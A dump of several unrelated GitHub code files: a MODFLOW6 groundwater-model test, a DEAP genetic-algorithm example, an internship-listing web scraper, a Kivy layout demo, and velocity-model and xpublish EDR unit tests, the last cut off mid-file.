sim_ws=scen_ws,\n continue_=False,\n )\n\n # Instantiate time discretization package\n tdis_rc = []\n for i in range(len(perlen)):\n tdis_rc.append((perlen[i], nstp[i], tsmult[i]))\n\n tdis = flopy.mf6.ModflowTdis(\n sim, time_units=\"DAYS\", nper=nper, perioddata=tdis_rc\n )\n\n # Instantiate the gwf model (parent model)\n gwf = flopy.mf6.ModflowGwf(\n sim,\n modelname=gwfname,\n save_flows=True,\n newtonoptions=\"NEWTON\",\n model_nam_file=\"{}.nam\".format(gwfname),\n )\n\n # Create iterative model solution and register the gwf model with it\n imsgwf = flopy.mf6.ModflowIms(\n sim,\n print_option=\"SUMMARY\",\n outer_dvclose=hclose,\n outer_maximum=nouter,\n under_relaxation=\"NONE\",\n inner_maximum=ninner,\n inner_dvclose=hclose,\n rcloserecord=rclose,\n linear_acceleration=\"BICGSTAB\",\n scaling_method=\"NONE\",\n reordering_method=\"NONE\",\n relaxation_factor=relax,\n filename=\"{}.ims\".format(gwfname),\n )\n sim.register_ims_package(imsgwf, [gwf.name])\n\n # Instantiate the discretization package\n dis = flopy.mf6.ModflowGwfdis(\n gwf,\n nlay=nlayp,\n nrow=nrowp,\n ncol=ncolp,\n delr=delrp,\n delc=delcp,\n top=topp,\n botm=botmp,\n idomain=idomainp,\n filename=\"{}.dis\".format(gwfname),\n )\n\n # Instantiate initial conditions package\n strt = [topp - 0.25, topp - 0.25, topp - 0.25]\n ic = flopy.mf6.ModflowGwfic(\n gwf, strt=strt, filename=\"{}.ic\".format(gwfname)\n )\n\n # Instantiate node property flow package\n npf = flopy.mf6.ModflowGwfnpf(\n gwf,\n save_flows=False,\n alternative_cell_averaging=\"AMT-LMK\",\n icelltype=icelltype,\n k=hk,\n k33=k33,\n save_specific_discharge=False,\n filename=\"{}.npf\".format(gwfname),\n )\n\n # output control\n oc = flopy.mf6.ModflowGwfoc(\n gwf,\n budget_filerecord=\"{}.bud\".format(gwfname),\n head_filerecord=\"{}.hds\".format(gwfname),\n headprintrecord=[(\"COLUMNS\", 10, \"WIDTH\", 15, \"DIGITS\", 6, \"GENERAL\")],\n saverecord=[(\"HEAD\", \"LAST\"), (\"BUDGET\", \"LAST\")],\n printrecord=[(\"HEAD\", \"LAST\"), (\"BUDGET\", \"LAST\")],\n )\n\n # Instantiate constant head package\n rowList = np.arange(0, nrowp).tolist()\n layList = np.arange(0, nlayp).tolist()\n chdspd_left = []\n chdspd_right = []\n\n # Loop through rows, the left & right sides will appear in separate,\n # dedicated packages\n hd_left = 49.75\n hd_right = 44.75\n for l in layList:\n for r in rowList:\n # first, do left side of model\n chdspd_left.append([(l, r, 0), hd_left])\n # finally, do right side of model\n chdspd_right.append([(l, r, ncolp - 1), hd_right])\n\n chdspd = {0: chdspd_left}\n chd1 = flopy.mf6.modflow.mfgwfchd.ModflowGwfchd(\n gwf,\n maxbound=len(chdspd),\n stress_period_data=chdspd,\n save_flows=False,\n pname=\"CHD-1\",\n filename=\"{}.chd1.chd\".format(gwfname),\n )\n chdspd = {0: chdspd_right}\n chd2 = flopy.mf6.modflow.mfgwfchd.ModflowGwfchd(\n gwf,\n maxbound=len(chdspd),\n stress_period_data=chdspd,\n save_flows=False,\n pname=\"CHD-2\",\n filename=\"{}.chd2.chd\".format(gwfname),\n )\n\n welspd_mf6 = []\n # [(layer, row, column), flow]\n welspd_mf6.append([(3 - 1, 8 - 1, 10 - 1), -5.0])\n wel_mf6_spd = {0: welspd_mf6}\n maxbound = len(welspd_mf6)\n wel = flopy.mf6.ModflowGwfwel(\n gwf,\n print_input=False,\n print_flows=True,\n maxbound=maxbound,\n mover=True,\n auto_flow_reduce=0.1,\n stress_period_data=wel_mf6_spd, # wel_spd established in the MVR setup\n boundnames=False,\n save_flows=True,\n pname=\"WEL-1\",\n filename=\"{}.wel\".format(gwfname),\n )\n\n # ---------------------------\n # Now work on the child grid\n # ---------------------------\n ncpp = 3\n ncppl = [3, 3, 0]\n\n lgr = Lgr(\n nlayp,\n nrowp,\n ncolp,\n delrp,\n delcp,\n topp,\n botmp,\n idomainp,\n ncpp=ncpp,\n ncppl=ncppl,\n xllp=0.0,\n yllp=0.0,\n )\n\n # Get child grid info:\n delrc, delcc = lgr.get_delr_delc()\n idomainc = lgr.get_idomain() # child idomain\n topc, botmc = lgr.get_top_botm() # top/bottom of child grid\n\n # Instantiate the gwf model (child model)\n gwfc = flopy.mf6.ModflowGwf(\n sim,\n modelname=gwfnamec,\n save_flows=True,\n newtonoptions=\"NEWTON\",\n model_nam_file=\"{}.nam\".format(gwfnamec),\n )\n\n # Instantiate the discretization package\n child_dis_shp = lgr.get_shape()\n nlayc = child_dis_shp[0]\n nrowc = child_dis_shp[1]\n ncolc = child_dis_shp[2]\n disc = flopy.mf6.ModflowGwfdis(\n gwfc,\n nlay=nlayc,\n nrow=nrowc,\n ncol=ncolc,\n delr=delrc,\n delc=delcc,\n top=topc,\n botm=botmc,\n idomain=idomainc,\n filename=\"{}.dis\".format(gwfnamec),\n )\n\n # Instantiate initial conditions package\n strtc = [\n topc - 0.25,\n topc - 0.25,\n topc - 0.25,\n topc - 0.25,\n topc - 0.25,\n topc - 0.25,\n ]\n icc = flopy.mf6.ModflowGwfic(\n gwfc, strt=strtc, filename=\"{}.ic\".format(gwfnamec)\n )\n\n # Instantiate node property flow package\n icelltypec = [1, 0, 0, 0, 0, 0]\n npfc = flopy.mf6.ModflowGwfnpf(\n gwfc,\n save_flows=False,\n alternative_cell_averaging=\"AMT-LMK\",\n icelltype=icelltypec,\n k=hk,\n k33=k33,\n save_specific_discharge=False,\n filename=\"{}.npf\".format(gwfnamec),\n )\n\n # output control\n occ = flopy.mf6.ModflowGwfoc(\n gwfc,\n budget_filerecord=\"{}.bud\".format(gwfnamec),\n head_filerecord=\"{}.hds\".format(gwfnamec),\n headprintrecord=[(\"COLUMNS\", 10, \"WIDTH\", 15, \"DIGITS\", 6, \"GENERAL\")],\n saverecord=[(\"HEAD\", \"LAST\"), (\"BUDGET\", \"LAST\")],\n printrecord=[(\"HEAD\", \"LAST\"), (\"BUDGET\", \"LAST\")],\n )\n\n welspd_mf6c = []\n # [(layer, row, column), flow]\n welspd_mf6c.append([(6 - 1, 4 - 1, 9 - 1), -10.0])\n wel_mf6_spdc = {0: welspd_mf6c}\n maxboundc = len(welspd_mf6c)\n welc = flopy.mf6.ModflowGwfwel(\n gwfc,\n print_input=False,\n print_flows=True,\n maxbound=maxboundc,\n mover=True,\n auto_flow_reduce=0.1,\n stress_period_data=wel_mf6_spdc, # wel_spd established in the MVR setup\n boundnames=False,\n save_flows=True,\n pname=\"WEL-2\",\n filename=\"{}.wel\".format(gwfnamec),\n )\n\n # exchange data\n exchange_data = lgr.get_exchange_data()\n\n # Establish GWF-GWF exchange\n gwfgwf = flopy.mf6.ModflowGwfgwf(\n sim,\n exgtype=\"GWF6-GWF6\",\n print_flows=True,\n print_input=True,\n exgmnamea=gwfname,\n exgmnameb=gwfnamec,\n nexg=len(exchange_data),\n exchangedata=exchange_data,\n mvr_filerecord=\"{}.mvr\".format(name),\n pname=\"EXG-1\",\n filename=\"{}.exg\".format(name),\n )\n\n return sim, gwf, gwfc\n\n\ndef add_parent_sfr(gwf, gwfname, conns):\n # Instatiate a scenario-specific sfr package\n pkdat = generate_parentmod_sfr_input(conns)\n sfrspd = {0: [[0, \"INFLOW\", 40.0]]}\n sfr = flopy.mf6.ModflowGwfsfr(\n gwf,\n print_stage=False,\n print_flows=True,\n budget_filerecord=gwfname + \".sfr.bud\",\n save_flows=True,\n mover=True,\n pname=\"SFR-parent\",\n unit_conversion=86400.00,\n boundnames=False,\n nreaches=len(conns),\n packagedata=pkdat,\n connectiondata=conns,\n perioddata=sfrspd,\n filename=\"{}.sfr\".format(gwfname),\n )\n\n\ndef add_child_sfr(gwfc, gwfnamec):\n # Instantiate child model sfr package (same for all scenarios)\n pkdatc = generate_childmod_sfr_input()\n sfrspd = {0: [[0, \"INFLOW\", 0.0]]}\n sfrc = flopy.mf6.ModflowGwfsfr(\n gwfc,\n print_stage=False,\n print_flows=True,\n budget_filerecord=gwfnamec + \".sfr.bud\",\n save_flows=True,\n mover=True,\n pname=\"SFR-child\",\n unit_conversion=86400.00,\n boundnames=False,\n nreaches=len(connsc),\n packagedata=pkdatc,\n connectiondata=connsc,\n perioddata=sfrspd,\n filename=\"{}.sfr\".format(gwfnamec),\n )\n\n\ndef add_parent_mvr(gwf, gwfname, frac):\n # get scenario specific mvr data\n mvrspd = get_parent_mvr_info(frac)\n mvr = flopy.mf6.ModflowGwfmvr(\n gwf,\n maxmvr=maxmvr,\n print_flows=True,\n maxpackages=maxpackages,\n packages=mvrpack,\n perioddata=mvrspd,\n budget_filerecord=gwfname + \".mvr.bud\",\n filename=\"{}.mvr\".format(gwfname),\n )\n\n\ndef add_child_mvr(gwfc, gwfnamec):\n mvrc = flopy.mf6.ModflowGwfmvr(\n gwfc,\n maxmvr=maxmvr,\n print_flows=True,\n maxpackages=maxpackagesc,\n packages=mvrpackc,\n perioddata=mvrspdc,\n budget_filerecord=gwfnamec + \".mvr.bud\",\n filename=\"{}.mvr\".format(gwfnamec),\n )\n\n\ndef add_sim_mvr(sim, gwfname, gwfnamec, remaining_frac=None):\n # simulation-level mvr data\n mvrpack_sim = [[gwfname, \"SFR-parent\"], [gwfnamec, \"SFR-child\"]]\n maxpackages_sim = len(mvrpack_sim)\n\n # Set up static SFR-to-SFR connections that remain fixed for entire simulation\n if remaining_frac is not None:\n sim_mvr_perioddata = [ # don't forget to use 0-based values\n [\n mvrpack_sim[0][0],\n mvrpack_sim[0][1],\n 7,\n mvrpack_sim[1][0],\n mvrpack_sim[1][1],\n 0,\n \"FACTOR\",\n 1.00,\n ],\n [\n mvrpack_sim[1][0],\n mvrpack_sim[1][1],\n 88,\n mvrpack_sim[0][0],\n mvrpack_sim[0][1],\n 8,\n \"FACTOR\",\n 1.00,\n ],\n [\n mvrpack_sim[0][0],\n mvrpack_sim[0][1],\n 15,\n mvrpack_sim[0][0],\n mvrpack_sim[0][1],\n 16,\n \"FACTOR\",\n remaining_frac,\n ],\n ]\n else:\n sim_mvr_perioddata = [ # don't forget to use 0-based values\n [\n mvrpack_sim[0][0],\n mvrpack_sim[0][1],\n 7,\n mvrpack_sim[1][0],\n mvrpack_sim[1][1],\n 0,\n \"FACTOR\",\n 1.00,\n ],\n [\n mvrpack_sim[1][0],\n mvrpack_sim[1][1],\n 88,\n mvrpack_sim[0][0],\n mvrpack_sim[0][1],\n 8,\n \"FACTOR\",\n 1.00,\n ],\n ]\n\n mvrspd = {0: sim_mvr_perioddata}\n maxmvr = 3\n mvr = flopy.mf6.ModflowMvr(\n sim,\n modelnames=True,\n maxmvr=maxmvr,\n print_flows=True,\n maxpackages=maxpackages,\n packages=mvrpack_sim,\n perioddata=mvrspd,\n filename=\"{}.mvr\".format(name),\n )\n\n\ndef build_and_run_simulations():\n for idx, (scen_nm, conns, frac) in enumerate(\n zip(mvr_scens, scen_conns, parent_mvr_frac)\n ):\n scen_nm_parent = name + \"_\" + scen_nm + \"_p\"\n scen_nm_child = name + \"_\" + scen_nm + \"_c\"\n sim, gwf, gwfc = instantiate_base_simulation(\n mvr_scens[idx], scen_nm_parent, scen_nm_child\n )\n # add the sfr packages\n add_parent_sfr(gwf, scen_nm_parent, conns)\n add_child_sfr(gwfc, scen_nm_child)\n # add the mover packages (simulation level and gwf level)\n add_parent_mvr(gwf, scen_nm_parent, frac)\n add_child_mvr(gwfc, scen_nm_child)\n if frac is not None:\n add_sim_mvr(sim, scen_nm_parent, scen_nm_child, 1 - frac)\n else:\n add_sim_mvr(sim, scen_nm_parent, scen_nm_child)\n\n sim.write_simulation()\n\n # Run the simulation\n success, buff = sim.run_simulation(silent=False)\n if not success:\n print(buff)\n\n return success\n\n\ndef check_simulation_output():\n parent_sfr_last_reach_flow = []\n parent_sfr_mvr_amount = []\n sim_mvr_amount = []\n gwf_srch_str1 = (\n \" SFR-PARENT PACKAGE - SUMMARY OF FLOWS FOR EACH CONTROL VOLUME\"\n )\n gwf_srch_str2 = \" WATER MOVER PACKAGE (MVR) FLOW RATES \"\n sim_srch_str = \" WATER MOVER PACKAGE (MVR) FLOW RATES \"\n for idx, (cur_ws, gwfparent) in enumerate(zip(sim_workspaces, gwf_names)):\n with open(\n os.path.join(cur_ws, gwfparent + \".lst\"), \"r\"\n ) as gwf_lst, open(os.path.join(cur_ws, \"mfsim.lst\"), \"r\") as sim_lst:\n gwf_lst_lines = gwf_lst.readlines()\n sim_lst_lines = sim_lst.readlines()\n\n # Convert lists of lines to iterable objects\n gwf_lst = iter(gwf_lst_lines)\n sim_lst = iter(sim_lst_lines)\n\n # Peel mvr values from gwf lst file to be compared between scenarios\n done = False\n for line in gwf_lst:\n # adv file pointer to search line\n if gwf_srch_str1 in line:\n # once at the identified line, continue searching until sfr obj 17 queued\n while True:\n line = next(gwf_lst)\n m_arr = line.strip().split()\n if m_arr[0] == \"18\":\n # store the 3rd value on the line (it should be the same across all scenarios\n parent_sfr_last_reach_flow.append(float(m_arr[2]))\n break\n\n # the second search string will only appear in the 50/50 and 75/25 scenarios\n if gwf_srch_str2 in line and idx > 0:\n # once at srch_str2, continue searching until 2nd mvr connection queued\n while True:\n line = next(gwf_lst)\n m_arr = line.strip().split()\n if m_arr[0] == \"2\":\n parent_sfr_mvr_amount.append(float(m_arr[4]))\n done = True\n break\n\n if done:\n break\n\n # now cycle through the simulation lst file\n # only the 50/50 and 75/25 scenarios will have the descired line\n if idx > 0:\n for line in sim_lst:\n if sim_srch_str in line:\n while True:\n line = next(sim_lst)\n m_arr = line.strip().split()\n if m_arr[0] == \"3\":\n sim_mvr_amount.append(float(m_arr[4]))\n done = True\n break\n\n # perform the comparisons:\n # o check flow entering last reach of parent model\n # - should be the same across all 3 simulation\n # - for current version of model, this amount was roughly 214.25\n # o check the relative proportion of flows between gwf- and\n # simulation-level mvrs\n # - 50/50: ~107 units of flow in each\n # - 75/25: 75% goes through the gwf mvr, 25% through the simulation mvr\n for i in np.arange(len(parent_sfr_mvr_amount) - 1):\n assert math.isclose(\n parent_sfr_last_reach_flow[i],\n parent_sfr_last_reach_flow[i + 1],\n rel_tol=0.1,\n ), (\n \"Flow in the last reach of scenario \"\n + mvr_scens[i]\n + \" = \"\n + str(parent_sfr_last_reach_flow[i])\n + \", whereas the flow in scenario \"\n + mvr_scens[i + 1]\n + \" = \"\n + str(parent_sfr_last_reach_flow[i + 1])\n + \". Something changed, quitting.\"\n )\n\n # 50/50\n gwf_transferred_50 = parent_sfr_mvr_amount[0] / (\n parent_sfr_mvr_amount[0] + sim_mvr_amount[0]\n )\n sim_transferred_50 = sim_mvr_amount[0] / (\n parent_sfr_mvr_amount[0] + sim_mvr_amount[0]\n )\n assert np.allclose(\n np.array([gwf_transferred_50, sim_transferred_50]),\n np.array([0.5, 0.5]),\n rtol=0.1,\n ), \"There should be a 50/50 split in the amount of water transferred by the GWF- and simulation-level MVRs.\"\n\n # 75/25\n gwf_transferred_75 = parent_sfr_mvr_amount[1] / (\n parent_sfr_mvr_amount[1] + sim_mvr_amount[1]\n )\n sim_transferred_75 = sim_mvr_amount[1] / (\n parent_sfr_mvr_amount[1] + sim_mvr_amount[1]\n )\n assert np.allclose(\n np.array([gwf_transferred_75, sim_transferred_75]),\n np.array([0.75, 0.25]),\n rtol=0.1,\n ), \"There should be a 75/25 split in the amount of water transferred by the GWF- and simulation-level MVRs.\"\n\n\n# - No need to change any code below\ndef test_mf6model():\n # initialize testing framework\n test = testing_framework()\n\n # build the models\n build_and_run_simulations()\n\n # Check scenario output\n # evaluate list file output to ensure total flows are similar\n # no matter what the mvr connection setup is (i.e., simulation-level\n # mvr vs gwf-level mvr) or what the relative fraction between the\n # different level mvrs is.\n check_simulation_output()\n\n return\n\n\ndef main():\n # initialize testing framework\n test = testing_framework()\n\n # build the models\n build_and_run_simulations()\n\n # Check scenario output\n # evaluate list file output to ensure total flows are similar\n # no matter what the mvr connection setup is (i.e., simulation-level\n # mvr vs gwf-level mvr) or what the relative fraction between the\n # different level mvrs is.\n check_simulation_output()\n\n return\n\n\nif __name__ == \"__main__\":\n # print message\n print(\"standalone run of {}\".format(os.path.basename(__file__)))\n\n # run main routine\n main()\n","repo_name":"VB6Hobbyst7/modflow6","sub_path":"autotest/test_gwf_multimvr.py","file_name":"test_gwf_multimvr.py","file_ext":"py","file_size_in_byte":28555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"70932481371","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThe problem is very simple, we search for a 1 filled solution\n\"\"\"\nfrom __future__ import division\n\nimport random\nfrom deap import base, creator, tools, algorithms\n\n# Type creation (default: Fitness and individual)\n# #################################################################\n# Create Fitness\n# Maximizing --> replacing virtual weights by attribute 1.0;\ncreator.create(\"FitnessMax\", base.Fitness, weights=(1.0,))\n\n# Alternative: creator.create(\"FitnessMin\", base.Fitness, weights=(-1.0,))\n\n# Creates individual, inheritance of list\n# Holds fitnesss value of FitnessMax type\ncreator.create(\"Individual\", list, fitness=creator.FitnessMax)\n\n# Created classes are made available in creater module\n\n# Initialize objects of new classes\n# ################################################################\nind = creator.Individual([1, 0, 1, 1, 0])\n\nprint(ind)\nprint(type(ind))\nprint(type(ind.fitness))\nprint()\n\n# Toolbox\n# ################################################################\n# Container holding functions, that are stored under their name aliases\n\ntoolbox = base.Toolbox()\n\n# Function to call random integer between 0 and 1\ntoolbox.register(\"attr_bool\", random.randint, 0, 1)\n\n# Uses tools.initRepeat to fill individual with random 0, 1 integers\ntoolbox.register(\"individual\", tools.initRepeat,\n creator.Individual, toolbox.attr_bool, n=10)\n\n# Generate population of individuals\ntoolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n\nbit = toolbox.attr_bool()\nind = toolbox.individual()\npop = toolbox.population(n=3)\n\nprint(\"bit is of type %s and has value\\n%s\" % (type(bit), bit))\nprint(\n \"ind is of type %s and contains %d bits\\n%s\" % (type(ind), len(ind), ind))\nprint(\"pop is of type %s and contains %d individuals\\n%s\" % (\ntype(pop), len(pop), pop))\nprint()\n\n# Evaluate function\n# ################################################################\n\n# Count nb of 1 in individual\ndef evalOneMax(individual):\n return sum(individual),\n\n# Genetic Operators\n# ################################################################\n# Registering the operators and their default arguments in the toolbox\n\ntoolbox.register(\"evaluate\", evalOneMax)\ntoolbox.register(\"mate\", tools.cxTwoPoint)\n\n# indpb: Probability of each attribute to be mutated\ntoolbox.register(\"mutate\", tools.mutFlipBit, indpb=0.10)\ntoolbox.register(\"select\", tools.selTournament, tournsize=3)\n\nind = toolbox.individual()\nprint(ind)\ntoolbox.mutate(ind)\nprint(ind)\n\nmutant = toolbox.clone(ind)\nprint(mutant is ind)\nprint(mutant == ind)\n\n# Evolving the population\n# ################################################################\n\ndef main():\n import numpy\n\n pop = toolbox.population(n=50)\n hof = tools.HallOfFame(1)\n stats = tools.Statistics(lambda ind: ind.fitness.values)\n stats.register(\"avg\", numpy.mean)\n stats.register(\"min\", numpy.min)\n stats.register(\"max\", numpy.max)\n\n pop, logbook = algorithms.eaSimple(pop, toolbox, cxpb=0.5, mutpb=0.2,\n ngen=10, stats=stats, halloffame=hof,\n verbose=True)\n\n return pop, logbook, hof\n\n\nif __name__ == \"__main__\":\n pop, log, hof = main()\n print(\n \"Best individual is: %s\\nwith fitness: %s\" % (hof[0], hof[0].fitness))\n\n import matplotlib.pyplot as plt\n\n gen, avg, min_, max_ = log.select(\"gen\", \"avg\", \"min\", \"max\")\n plt.plot(gen, avg, label=\"average\")\n plt.plot(gen, min_, label=\"minimum\")\n plt.plot(gen, max_, label=\"maximum\")\n plt.xlabel(\"Generation\")\n plt.ylabel(\"Fitness\")\n plt.legend(loc=\"lower right\")\n plt.show()","repo_name":"RWTH-EBC/pyCity_resilience","sub_path":"pycity_resilience/others/deap_experiments/j_notebook.py","file_name":"j_notebook.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"73916357210","text":"import requests\nimport random\nimport json\nimport pprint\nimport re\nimport csv\n\nfrom get_proxy import proxys\nfrom configs import headers, cookies, city_codes\nfrom bs4 import BeautifulSoup\n\n\nclass Internship_spider():\n base_url = \"http://www.shixiseng.com/interns/\"\n new_city_codes = {v: k for k, v in city_codes.items()}\n\n def __init__(self, keyword, city):\n self.keyword = keyword\n self.city = city + \"市\"\n\n def __get_uuids(self):\n city_code = Internship_spider.new_city_codes[self.city]\n p = 1\n uuids = []\n while True:\n url = Internship_spider.base_url + \"c-\" + \\\n city_code + \"_?k=\" + self.keyword + \"&p=\" + str(p)\n htmls = requests.get(url, headers=random.choice(\n headers), cookies=cookies, proxies=random.choice(proxys)).text\n soup = BeautifulSoup(htmls, \"html5lib\")\n links = soup.select(\".position-list li .name-box a\")\n if len(links) == 0:\n break\n for link in links:\n uuids.append(link.get('data-info'))\n p += 1\n return uuids\n\n def __analysis(self, uuids):\n intern_urls = []\n for uuid in uuids:\n intern_urls.append(\n \"https://wap.shixiseng.com/app/intern/info?uuid=\" + uuid)\n internships = []\n for intern_url in intern_urls:\n unicode_strs = requests.get(intern_url, headers=random.choice(\n headers), cookies=cookies, proxies=random.choice(proxys)).text\n htmls = unicode_strs.encode('latin-1').decode('unicode_escape')\n title = str(re.findall('\"iname\"\\:([\\s\\S]*?)\\,', htmls))[4:-3]\n company = {\"company_name\": str(re.findall('\"cname\"\\:([\\s\\S]*?)\\,', htmls))[4:-3],\n \"industry\": str(re.findall('\"industry\"\\:([\\s\\S]*?)\\,', htmls))[4:-3],\n \"scale\": str(re.findall('\"scale\"\\:([\\s\\S]*?)\\,', htmls))[4:-3]\n }\n salary = str(re.findall('\"minsal\"\\:([\\s\\S]*?)\\,', htmls))[4:-3] + \"-\" + str(\n re.findall('\"maxsal\"\\:([\\s\\S]*?)\\,', htmls))[4:-3]\n frequency = str(re.findall(\n '\"day\"\\:([\\s\\S]*?)\\,', htmls))[3:-2] + '天每周'\n month = str(re.findall(\n '\"month\"\\:([\\s\\S]*?)\\,', htmls))[3:-2] + '个月'\n address = str(re.findall('\"address\"\\:([\\s\\S]*?)\\,', htmls))[4:-3]\n degree = str(re.findall('\"degree\"\\:([\\s\\S]*?)\\,', htmls))[4:-3]\n refresh_time = str(re.findall(\n '\"refresh\"\\:([\\s\\S]*?)\\,', htmls))[4:-3]\n info = [title, company, salary, frequency,\n month, address, degree, refresh_time]\n internships.append(info)\n return internships\n\n def __save(self, internships):\n f = open(\"internship_data.csv\", \"a\")\n writer = csv.writer(f)\n writer.writerows(internships)\n f.close()\n\n def go(self):\n uuids = self.__get_uuids()\n internships = self.__analysis(uuids)\n self.__save(internships)\n\n\nspider = Internship_spider(\"Python\", \"北京\")\nspider.go()\n","repo_name":"hellen931126/job_spider","sub_path":"internship_spider.py","file_name":"internship_spider.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4949463505","text":"from kivy.app import App\r\nfrom kivy.uix.button import Button\r\nfrom kivy.uix.gridlayout import GridLayout\r\n\r\nclass Ornek(App):\r\n def build(self):\r\n\r\n govde = GridLayout(cols = 2)\r\n # Azami 2 sütundan oluşmasını istedik\r\n # 2 sütundan sonra alta kayacak.\r\n\r\n # Birden fazla buton ekleyip nasıl görünecek\r\n # for döngüsü ile ekleyelim\r\n\r\n for i in range(10):\r\n if (i%2 == 0):\r\n # Aynı sütuna denk gelenler için\r\n govde.add_widget(Button(text = \"{}\".format(i+1),\r\n size_hint_x = .4))\r\n else:\r\n govde.add_widget(Button(text = \"{}\".format(i+1)))\r\n\r\n return govde\r\n\r\nOrnek().run()\r\n\r\n","repo_name":"bgr8/Python-Projeleri","sub_path":"Kivy/3.Pencere Düzenleri/3.GridLayout/gridlayout.py","file_name":"gridlayout.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30944025724","text":"from __future__ import division, print_function\n\n# Import Python modules\nimport os\n\n# Import BBP modules\nimport vm2vm\nimport seqnum\nimport filecmp\nimport unittest\nimport bband_utils\nfrom install_cfg import InstallCfg\n\nclass TestVm2vm(unittest.TestCase):\n \"\"\"\n Unit tests for the velocity model conversion codes\n \"\"\"\n def setUp(self):\n \"\"\"\n Copy needed files to run the test\n \"\"\"\n self.install = InstallCfg()\n self.sim_id = int(seqnum.get_seq_num())\n self.a_tmpdir = os.path.join(self.install.A_TMP_DATA_DIR, str(self.sim_id))\n self.a_ucsb_refdir = os.path.join(self.install.A_TEST_REF_DIR, \"ucsb\")\n self.a_sdsu_refdir = os.path.join(self.install.A_TEST_REF_DIR, \"sdsu\")\n self.a_gp_refdir = os.path.join(self.install.A_TEST_REF_DIR, \"gp\")\n\n #\n # Make sure output directories exist\n #\n bband_utils.mkdirs([self.a_tmpdir])\n\n def test_vm2vm(self):\n \"\"\"\n input a GP format file and get out a SDSU format file\n \"\"\"\n gpfile = os.path.join(self.a_sdsu_refdir, \"gp_velmodel.v1d\")\n sdsufile = os.path.join(self.a_tmpdir, \"gp_velmodel.sdsu\")\n sdsuref = os.path.join(self.a_sdsu_refdir, \"sdsu_velmodel.ref\")\n _ = vm2vm.gpvm2sdsuvm(gpfile, sdsufile)\n errmsg = \"Conversion of velmodel from GP to SDSU failed\"\n self.failIf(filecmp.cmp(sdsuref, sdsufile) == False, errmsg)\n\n def test_vm2vm_nga(self):\n \"\"\"\n input a GP format file and get out a SDSU format file\n \"\"\"\n gpfile = os.path.join(self.a_gp_refdir, \"nga_rock1.v1d\")\n sdsufile = os.path.join(self.a_tmpdir, \"sdsu_nga_rock1.v1d\")\n sdsuref = os.path.join(self.a_sdsu_refdir, \"sdsu_nga_rock1.v1d\")\n _ = vm2vm.gpvm2sdsuvm(gpfile, sdsufile)\n errmsg = \"Conversion of velmodel from GP to SDSU failed\"\n self.failIf(filecmp.cmp(sdsuref, sdsufile) == False, errmsg)\n\n def test_vm2ucsb(self):\n \"\"\"\n input a GP format file and get out a UCSB format file\n \"\"\"\n gpfile = os.path.join(self.a_ucsb_refdir, \"gp_velocity_model.txt\")\n ofile = os.path.join(self.a_tmpdir, \"ucsb_velocity_model.txt\")\n ucsbref = os.path.join(self.a_ucsb_refdir, \"ucsb_velocity_model.txt\")\n _ = vm2vm.gpvm2ucsbvm(gpfile, ofile)\n errmsg = \"Conversion of velmodel from GP to UCSB ffailed\"\n self.failIf(filecmp.cmp(ucsbref, ofile) == False, errmsg)\n\n def test_vm2ucsb_nga(self):\n \"\"\"\n input a GP format file and get out a UCSB format file\n \"\"\"\n gpfile = os.path.join(self.a_gp_refdir, \"nga_rock1.v1d\")\n ofile = os.path.join(self.a_tmpdir, \"ucsb_nga_rock1.v1d\")\n ucsbref = os.path.join(self.a_ucsb_refdir, \"ucsb_nga_rock1.v1d\")\n _ = vm2vm.gpvm2ucsbvm(gpfile, ofile)\n errmsg = \"Conversion of velmodel from GP to UCSB ffailed\"\n self.failIf(filecmp.cmp(ucsbref, ofile) == False, errmsg)\n\nif __name__ == '__main__':\n SUITE = unittest.TestLoader().loadTestsFromTestCase(TestVm2vm)\n unittest.TextTestRunner(verbosity=2).run(SUITE)\n","repo_name":"UWGeotech/bbpUW","sub_path":"bbp/tests/test_vm2vm.py","file_name":"test_vm2vm.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41731646646","text":"import pytest\nimport xpublish\nfrom fastapi.testclient import TestClient\n\nfrom xpublish_edr import CfEdrPlugin\n\n\n@pytest.fixture(scope=\"session\")\ndef cf_dataset():\n from cf_xarray.datasets import airds\n\n return airds\n\n\n@pytest.fixture(scope=\"session\")\ndef cf_xpublish(cf_dataset):\n rest = xpublish.Rest({\"air\": cf_dataset}, plugins={\"edr\": CfEdrPlugin()})\n\n return rest\n\n\n@pytest.fixture(scope=\"session\")\ndef cf_client(cf_xpublish):\n app = cf_xpublish.app\n client = TestClient(app)\n\n return client\n\n\ndef test_cf_position_formats(cf_client):\n response = cf_client.get(\"/edr/position/formats\")\n\n assert response.status_code == 200, \"Response did not return successfully\"\n\n data = response.json()\n\n assert \"cf_covjson\" in data, \"cf_covjson is not a valid format\"\n assert \"nc\" in data, \"nc is not a valid format\"\n assert \"csv\" in data, \"csv is not a valid format\"\n\n\ndef test_cf_position_query(cf_client, cf_dataset):\n x = 204\n y = 44\n response = cf_client.get(f\"/datasets/air/edr/position?coords=POINT({x} {y})\")\n\n assert response.status_code == 200, \"Response did not return successfully\"\n\n data = response.json()\n\n for key in (\"type\", \"domain\", \"parameters\", \"ranges\"):\n assert key in data, f\"Key {key} is not a top level key in the CovJSON response\"\n\n axes = data[\"domain\"][\"axes\"]\n\n assert axes[\"x\"] == {\"values\": [205.0]}, \"Did not select nearby x coordinate\"\n assert axes[\"y\"] == {\"values\": [45.0]}, \"Did not select a nearby y coordinate\"\n\n assert (\n len(axes[\"t\"][\"values\"]) == 4\n ), \"There should be a time value for each time step\"\n\n air_param = data[\"parameters\"][\"air\"]\n\n assert (\n air_param[\"unit\"][\"label\"][\"en\"] == cf_dataset[\"air\"].attrs[\"units\"]\n ), \"DataArray units should be set as parameter units\"\n assert (\n air_param[\"observedProperty\"][\"id\"] == cf_dataset[\"air\"].attrs[\"standard_name\"]\n ), \"DataArray standard_name should be set as the observed property id\"\n assert (\n air_param[\"observedProperty\"][\"label\"][\"en\"]\n == 